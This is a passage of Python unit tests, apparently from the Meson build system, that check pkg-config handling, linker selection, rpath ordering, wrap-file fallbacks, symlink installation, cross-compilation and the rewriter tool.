usage/dependency') testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee') if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: raise unittest.SkipTest('Glib 2.0 dependency not available.') with tempfile.TemporaryDirectory() as tempdirname: self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False) self.install(use_destdir=False) shutil.rmtree(self.builddir) os.mkdir(self.builddir) pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc'))) lib_dir = os.path.join(tempdirname, 'lib') myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = pkg_dir # Private internal libraries must not leak out. pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv) self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.') # Dependencies must not leak to cflags when building only a shared library. pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv) self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.') # Test that the result is usable. 
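# Build the dependee project against the installed libpkgdep and run the produced binary with LD_LIBRARY_PATH (and PATH on Cygwin) pointing at the install tree.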
self.init(testdir2, override_envvars=myenv) self.build(override_envvars=myenv) myenv = os.environ.copy() myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')]) if is_cygwin(): bin_dir = os.path.join(tempdirname, 'bin') myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH'] self.assertTrue(os.path.isdir(lib_dir)) test_exe = os.path.join(self.builddir, 'pkguser') self.assertTrue(os.path.isfile(test_exe)) subprocess.check_call(test_exe, env=myenv) @skipIfNoPkgconfig def test_pkgconfig_relative_paths(self): testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths') pkg_dir = os.path.join(testdir, 'pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc'))) env = get_fake_env(testdir, self.builddir, self.prefix) env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='') kwargs = {'required': True, 'silent': True} relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs) self.assertTrue(relative_path_dep.found()) # Ensure link_args are properly quoted libpath = Path(self.builddir) / '../relativepath/lib' link_args = ['-L' + libpath.as_posix(), '-lrelativepath'] self.assertEqual(relative_path_dep.get_link_args(), link_args) @skipIfNoPkgconfig def test_pkgconfig_internal_libraries(self): ''' ''' with tempfile.TemporaryDirectory() as tempdirname: # build library testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries') testdirlib = os.path.join(testdirbase, 'lib') self.init(testdirlib, extra_args=['--prefix=' + tempdirname, '--libdir=lib', '--default-library=static'], default_args=False) self.build() self.install(use_destdir=False) # build user of library pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_static_archive_stripping(self): ''' Check that Meson produces valid static archives with --strip enabled ''' with tempfile.TemporaryDirectory() as tempdirname: testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping') # build lib self.new_builddir() testdirlib = os.path.join(testdirbase, 'lib') testlibprefix = os.path.join(tempdirname, 'libprefix') self.init(testdirlib, extra_args=['--prefix=' + testlibprefix, '--libdir=lib', '--default-library=static', '--buildtype=debug', '--strip'], default_args=False) self.build() self.install(use_destdir=False) # build executable (uses lib, fails if static archive has been stripped incorrectly) pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_pkgconfig_formatting(self): testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv) deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething'] if is_windows() or is_cygwin() or is_osx() or is_openbsd(): # On Windows, libintl is a separate library deps.append(b'-lintl') self.assertEqual(set(deps), set(stdo.split())) @skipIfNoPkgconfig @skip_if_not_language('cs') def test_pkgconfig_csharp_library(self): testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = 
subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip()) @skipIfNoPkgconfig def test_pkgconfig_link_order(self): ''' Test that libraries are listed before their dependencies. ''' testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) deps = stdo.split() self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency')) def test_deterministic_dep_order(self): ''' Test that the dependencies are always listed in a deterministic order. ''' testdir = os.path.join(self.unit_test_dir, '43 dep order') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'build myexe:' in line or 'build myexe.exe:' in line: self.assertIn('liblib1.a liblib2.a', line) return raise RuntimeError('Could not find the build rule') def test_deterministic_rpath_order(self): ''' Test that the rpaths are always listed in a deterministic order. ''' if is_cygwin(): raise unittest.SkipTest('rpath are not used on Cygwin') testdir = os.path.join(self.unit_test_dir, '42 rpath order') self.init(testdir) if is_osx(): rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2') else: rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2') with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if '-rpath' in line: self.assertRegex(line, rpathre) return raise RuntimeError('Could not find the rpath') def test_override_with_exe_dep(self): ''' Test that we produce the correct dependencies when a program is overridden with an executable. ''' testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'main1.c:' in line or 'main2.c:' in line: self.assertIn('| subprojects/sub/foobar', line) @skipIfNoPkgconfig def test_usage_external_library(self): ''' Test that uninstalled usage of an external library (from the system or PkgConfigDependency) works. On macOS, this workflow works out of the box. On Linux, BSDs, Windows, etc, you need to set extra arguments such as LD_LIBRARY_PATH, etc, so this test is skipped. The system library is found with cc.find_library() and pkg-config deps. 
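The external library is first installed into the test's install directory, and LIBRARY_PATH plus PKG_CONFIG_PATH are pointed at that location before the consumer project is configured.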
''' oldprefix = self.prefix # Install external library so we can find it testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library') # install into installdir without using DESTDIR installdir = self.installdir self.prefix = installdir self.init(testdir) self.prefix = oldprefix self.build() self.install(use_destdir=False) ## New builddir for the consumer self.new_builddir() env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir), 'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')} testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library') # install into installdir without using DESTDIR self.prefix = self.installdir self.init(testdir, override_envvars=env) self.prefix = oldprefix self.build(override_envvars=env) # test uninstalled self.run_tests(override_envvars=env) if not (is_osx() or is_linux()): return # test running after installation self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'prog') self._run([prog]) if not is_osx(): # Rest of the workflow only works on macOS return out = self._run(['otool', '-L', prog]) self.assertNotIn('@rpath', out) ## New builddir for testing that DESTDIR is not added to install_name self.new_builddir() # install into installdir with DESTDIR self.init(testdir, override_envvars=env) self.build(override_envvars=env) # test running after installation self.install(override_envvars=env) prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog') lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib') for f in prog, lib: out = self._run(['otool', '-L', f]) # Ensure that the otool output does not contain self.installdir self.assertNotRegex(out, self.installdir + '.*dylib ') @skipIfNoPkgconfig def test_usage_pkgconfig_prefixes(self): ''' Build and install two external libraries, to different prefixes, then build and install a client program that finds them via pkgconfig, and verify the installed client program runs. 
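Each library is installed under its own prefix (val1, val2) inside the test install directory, and the client's output is expected to be the sum of the values the two libraries provide.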
''' oldinstalldir = self.installdir # Build and install both external libraries without DESTDIR val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1') val1prefix = os.path.join(oldinstalldir, 'val1') self.prefix = val1prefix self.installdir = val1prefix self.init(val1dir) self.build() self.install(use_destdir=False) self.new_builddir() env1 = {} env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig') val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2') val2prefix = os.path.join(oldinstalldir, 'val2') self.prefix = val2prefix self.installdir = val2prefix self.init(val2dir, override_envvars=env1) self.build() self.install(use_destdir=False) self.new_builddir() # Build, install, and run the client program env2 = {} env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig') testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client') testprefix = os.path.join(oldinstalldir, 'client') self.prefix = testprefix self.installdir = testprefix self.init(testdir, override_envvars=env2) self.build() self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'client') env3 = {} if is_cygwin(): env3['PATH'] = os.path.join(val1prefix, 'bin') + \ os.pathsep + \ os.path.join(val2prefix, 'bin') + \ os.pathsep + os.environ['PATH'] out = self._run([prog], override_envvars=env3).strip() # Expected output is val1 + val2 = 3 self.assertEqual(out, '3') def install_subdir_invalid_symlinks(self, testdir, subdir_path): ''' Test that installation of broken symlinks works fine. https://github.com/mesonbuild/meson/issues/3914 ''' testdir = os.path.join(self.common_test_dir, testdir) subdir = os.path.join(testdir, subdir_path) with chdir(subdir): # Can't distribute broken symlinks in the source tree because it breaks # the creation of zipapps. Create it dynamically and run the test by # hand. 
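# The link target deliberately does not exist; installation must copy the symlink itself rather than resolve it, so the installed path is a link but not a regular file.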
src = '../../nonexistent.txt' os.symlink(src, 'invalid-symlink.txt') try: self.init(testdir) self.build() self.install() install_path = subdir_path.split(os.path.sep)[-1] link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt') self.assertTrue(os.path.islink(link), msg=link) self.assertEqual(src, os.readlink(link)) self.assertFalse(os.path.isfile(link), msg=link) finally: os.remove(os.path.join(subdir, 'invalid-symlink.txt')) def test_install_subdir_symlinks(self): self.install_subdir_invalid_symlinks('60 install subdir', os.path.join('sub', 'sub1')) def test_install_subdir_symlinks_with_default_umask(self): self.install_subdir_invalid_symlinks('191 install_mode', 'sub2') def test_install_subdir_symlinks_with_default_umask_and_mode(self): self.install_subdir_invalid_symlinks('191 install_mode', 'sub1') @skipIfNoPkgconfigDep('gmodule-2.0') def test_ldflag_dedup(self): testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup') if is_cygwin() or is_osx(): raise unittest.SkipTest('Not applicable on Cygwin or OSX.') env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) linker = cc.linker if not linker.export_dynamic_args(env): raise unittest.SkipTest('Not applicable for linkers without --export-dynamic') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') max_count = 0 search_term = '-Wl,--export-dynamic' with open(build_ninja, 'r', encoding='utf-8') as f: for line in f: max_count = max(max_count, line.count(search_term)) self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.') def test_compiler_libs_static_dedup(self): testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: lines = f.readlines() for lib in ('-ldl', '-lm', '-lc', '-lrt'): for line in lines: if lib not in line: continue # Assert that self.assertEqual(len(line.split(lib)), 2, msg=(lib, line)) @skipIfNoPkgconfig def test_noncross_options(self): # C_std defined in project options must be in effect also when native compiling. 
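# Both entries in the compilation database should therefore carry -std=c99.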
testdir = os.path.join(self.unit_test_dir, '51 noncross options') self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir]) compdb = self.get_compdb() self.assertEqual(len(compdb), 2) self.assertRegex(compdb[0]['command'], '-std=c99') self.assertRegex(compdb[1]['command'], '-std=c99') self.build() def test_identity_cross(self): testdir = os.path.join(self.unit_test_dir, '61 identity cross') nativefile = tempfile.NamedTemporaryFile(mode='w') nativefile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'build_wrapper.py')))) nativefile.flush() self.meson_native_file = nativefile.name crossfile = tempfile.NamedTemporaryFile(mode='w') crossfile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'host_wrapper.py')))) crossfile.flush() self.meson_cross_file = crossfile.name # TODO should someday be explicit about build platform only here self.init(testdir) def test_identity_cross_env(self): testdir = os.path.join(self.unit_test_dir, '61 identity cross') env = { 'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"', } crossfile = tempfile.NamedTemporaryFile(mode='w') crossfile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'host_wrapper.py')))) crossfile.flush() self.meson_cross_file = crossfile.name # TODO should someday be explicit about build platform only here self.init(testdir, override_envvars=env) @skipIfNoPkgconfig def test_static_link(self): if is_cygwin(): raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.") # Build some libraries and install them testdir = os.path.join(self.unit_test_dir, '68 static link/lib') libdir = os.path.join(self.installdir, self.libdir) oldprefix = self.prefix self.prefix = self.installdir self.init(testdir) self.install(use_destdir=False) # Test that installed libraries works self.new_builddir() self.prefix = oldprefix meson_args = ['-Dc_link_args=-L{}'.format(libdir), '--fatal-meson-warnings'] testdir = os.path.join(self.unit_test_dir, '68 static link') env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')} self.init(testdir, extra_args=meson_args, override_envvars=env) self.build() self.run_tests() def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None: if is_sunos(): raise unittest.SkipTest('Solaris currently cannot override the linker.') if not shutil.which(check): raise unittest.SkipTest('Could not find {}.'.format(check)) envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]] # Also test a deprecated variable if there is one. 
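# (the deprecated spelling, if any, is taken from BinaryTable.DEPRECATION_MAP below)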
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP: envvars.append( mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]]) for envvar in envvars: with mock.patch.dict(os.environ, {envvar: name}): env = get_fake_env() comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler, mesonbuild.compilers.AppleClangCPPCompiler, mesonbuild.compilers.AppleClangObjCCompiler, mesonbuild.compilers.AppleClangObjCPPCompiler)): raise unittest.SkipTest('AppleClang is currently only supported with ld64') if lang != 'rust' and comp.use_linker_args('bfd') == []: raise unittest.SkipTest( 'Compiler {} does not support using alternative linkers'.format(comp.id)) self.assertEqual(comp.linker.id, expected) def test_ld_environment_variable_bfd(self): self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd') def test_ld_environment_variable_gold(self): self._check_ld('ld.gold', 'gold', 'c', 'ld.gold') def test_ld_environment_variable_lld(self): self._check_ld('ld.lld', 'lld', 'c', 'ld.lld') @skip_if_not_language('rust') @skipIfNoExecutable('ld.gold') # need an additional check here because _check_ld checks for gcc def test_ld_environment_variable_rust(self): self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold') def test_ld_environment_variable_cpp(self): self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold') @skip_if_not_language('objc') def test_ld_environment_variable_objc(self): self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold') @skip_if_not_language('objcpp') def test_ld_environment_variable_objcpp(self): self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold') @skip_if_not_language('fortran') def test_ld_environment_variable_fortran(self): self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold') @skip_if_not_language('d') def test_ld_environment_variable_d(self): # At least for me, ldc defaults to gold, and gdc defaults to bfd, so # let's pick lld, which isn't the default for either (currently) self._check_ld('ld.lld', 'lld', 'd', 'ld.lld') def compute_sha256(self, filename): with open(filename, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() def test_wrap_with_file_url(self): testdir = os.path.join(self.unit_test_dir, '74 wrap file url') source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz') patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz') wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap') source_hash = self.compute_sha256(source_filename) patch_hash = self.compute_sha256(patch_filename) wrap = textwrap.dedent("""\ [wrap-file] directory = foo source_url = http://server.invalid/foo source_fallback_url = file://{} source_filename = foo.tar.xz source_hash = {} patch_url = http://server.invalid/foo patch_fallback_url = file://{} patch_filename = foo-patch.tar.xz patch_hash = {} """.format(source_filename, source_hash, patch_filename, patch_hash)) with open(wrap_filename, 'w') as f: f.write(wrap) self.init(testdir) self.build() self.run_tests() windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache')) windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo')) os.unlink(wrap_filename) def test_no_rpath_for_static(self): testdir = os.path.join(self.common_test_dir, '5 linkstatic') self.init(testdir) self.build() build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertIsNone(build_rpath) def test_lookup_system_after_broken_fallback(self): # Just to generate libfoo.pc so we can test system dependency lookup. 
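# The generated libfoo.pc lands in the build's private dir, which is later passed as PKG_CONFIG_LIBDIR.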
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) privatedir = self.privatedir # Write test project where the first dependency() returns not-found # because 'broken' subproject does not exit, but that should not prevent # the 2nd dependency() to lookup on system. self.new_builddir() with tempfile.TemporaryDirectory() as d: with open(os.path.join(d, 'meson.build'), 'w') as f: f.write(textwrap.dedent('''\ project('test') dependency('notfound', fallback: 'broken', required: false) dependency('libfoo', fallback: 'broken', required: true) ''')) self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir}) def test_as_link_whole(self): testdir = os.path.join(self.unit_test_dir, '78 as link whole') self.init(testdir) with open(os.path.join(self.privatedir, 'bar1.pc')) as f: content = f.read() self.assertIn('-lfoo', content) with open(os.path.join(self.privatedir, 'bar2.pc')) as f: content = f.read() self.assertNotIn('-lfoo', content) class BaseLinuxCrossTests(BasePlatformTests): # Don't pass --libdir when cross-compiling. We have tests that # check whether meson auto-detects it correctly. libdir = None def should_run_cross_arm_tests(): return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm') @unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM") class LinuxCrossArmTests(BaseLinuxCrossTests): ''' Tests that cross-compilation to Linux/ARM works ''' def setUp(self): super().setUp() src_root = os.path.dirname(__file__) self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt') def test_cflags_cross_environment_pollution(self): ''' Test that the CFLAGS environment variable does not pollute the cross environment. This can't be an ordinary test case because we need to inspect the compiler database. ''' testdir = os.path.join(self.common_test_dir, '3 static') self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'}) compdb = self.get_compdb() self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command']) def test_cross_file_overrides_always_args(self): ''' Test that $lang_args in cross files always override get_always_args(). Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some architectures such as some Android versions and Raspbian. https://github.com/mesonbuild/meson/issues/3049 https://github.com/mesonbuild/meson/issues/3089 ''' testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args') self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt') self.init(testdir) compdb = self.get_compdb() self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS') self.build() def test_cross_libdir(self): # When cross compiling "libdir" should default to "lib" # rather than "lib/x86_64-linux-gnu" or something like that. testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) for i in self.introspect('--buildoptions'): if i['name'] == 'libdir': self.assertEqual(i['value'], 'lib') return self.assertTrue(False, 'Option libdir not in introspect data.') def test_cross_libdir_subproject(self): # Guard against a regression where calling "subproject" # would reset the value of libdir to its default value. 
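# Configure with an explicit --libdir and check that the value survives the subproject() call.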
testdir = os.path.join(self.unit_test_dir, '77 subdir libdir') self.init(testdir, extra_args=['--libdir=fuf']) for i in self.introspect('--buildoptions'): if i['name'] == 'libdir': self.assertEqual(i['value'], 'fuf') return self.assertTrue(False, 'Libdir specified on command line gets reset.') def test_std_remains(self): # C_std defined in project options must be in effect also when cross compiling. testdir = os.path.join(self.unit_test_dir, '51 noncross options') self.init(testdir) compdb = self.get_compdb() self.assertRegex(compdb[0]['command'], '-std=c99') self.build() @skipIfNoPkgconfig def test_pkg_config_option(self): if not shutil.which('arm-linux-gnueabihf-pkg-config'): raise unittest.SkipTest('Cross-pkgconfig not found.') testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option') self.init(testdir, extra_args=[ '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'), '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'), ]) def should_run_cross_mingw_tests(): return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin()) @unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW") class LinuxCrossMingwTests(BaseLinuxCrossTests): ''' Tests that cross-compilation to Windows/MinGW works ''' def setUp(self): super().setUp() src_root = os.path.dirname(__file__) self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt') def test_exe_wrapper_behaviour(self): ''' Test that an exe wrapper that isn't found doesn't cause compiler sanity checks and compiler checks to fail, but causes configure to fail if it requires running a cross-built executable (custom_target or run_target) and causes the tests to be skipped if they are run. 
''' testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour') # Configures, builds, and tests fine by default self.init(testdir) self.build() self.run_tests() self.wipe() os.mkdir(self.builddir) # Change cross file to use a non-existing exe_wrapper and it should fail self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt') # Force tracebacks so we can detect them properly env = {'MESON_FORCE_BACKTRACE': '1'} with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'): # Must run in-process or we'll get a generic CalledProcessError self.init(testdir, extra_args='-Drun-target=false', inprocess=True, override_envvars=env) with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'): # Must run in-process or we'll get a generic CalledProcessError self.init(testdir, extra_args='-Dcustom-target=false', inprocess=True, override_envvars=env) self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'], override_envvars=env) self.build() with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'): # Must run in-process or we'll get a generic CalledProcessError self.run_tests(inprocess=True, override_envvars=env) @skipIfNoPkgconfig def test_cross_pkg_config_option(self): testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option') self.init(testdir, extra_args=[ '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'), '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'), ]) class PythonTests(BasePlatformTests): ''' Tests that verify compilation of python extension modules ''' def test_versions(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name)) testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule') # No python version specified, this will use meson's python self.init(testdir) self.build() self.run_tests() self.wipe() # When specifying a known name, (python2 / python3) the module # will also try 'python' as a fallback and use it if the major # version matches try: self.init(testdir, extra_args=['-Dpython=python2']) self.build() self.run_tests() except unittest.SkipTest: # python2 is not necessarily installed on the test machine, # if it is not, or the python headers can't be found, the test # will raise MESON_SKIP_TEST, we could check beforehand what version # of python is available, but it's a bit of a chicken and egg situation, # as that is the job of the module, so we just ask for forgiveness rather # than permission. 
pass self.wipe() for py in ('pypy', 'pypy3'): try: self.init(testdir, extra_args=['-Dpython=%s' % py]) except unittest.SkipTest: # Same as above, pypy2 and pypy3 are not expected to be present # on the test system, the test project only raises in these cases continue # We have a pypy, this is expected to work self.build() self.run_tests() self.wipe() # The test is configured to error out with MESON_SKIP_TEST # in case it could not find python with self.assertRaises(unittest.SkipTest): self.init(testdir, extra_args=['-Dpython=not-python']) self.wipe() # While dir is an external command on both Windows and Linux, # it certainly isn't python with self.assertRaises(unittest.SkipTest): self.init(testdir, extra_args=['-Dpython=dir']) self.wipe() class RewriterTests(BasePlatformTests): def setUp(self): super().setUp() self.maxDiff = None def prime(self, dirname): copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir) def rewrite_raw(self, directory, args): if isinstance(args, str): args = [args] command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, timeout=60) print('STDOUT:') print(p.stdout) print('STDERR:') print(p.stderr) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) if not p.stderr: return {} return json.loads(p.stderr) def rewrite(self, directory, args): if isinstance(args, str): args = [args] return self.rewrite_raw(directory, ['command'] + args) def test_target_source_list(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']}, } } self.assertDictEqual(out, expected) def test_target_add_sources(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 
'a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, } } self.assertDictEqual(out, expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, expected) def test_target_add_sources_abs(self): self.prime('1 basic') abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']] add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}]) inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}]) self.rewrite(self.builddir, add) out = self.rewrite(self.builddir, inf) expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}} self.assertDictEqual(out, expected) def test_target_remove_sources(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']}, 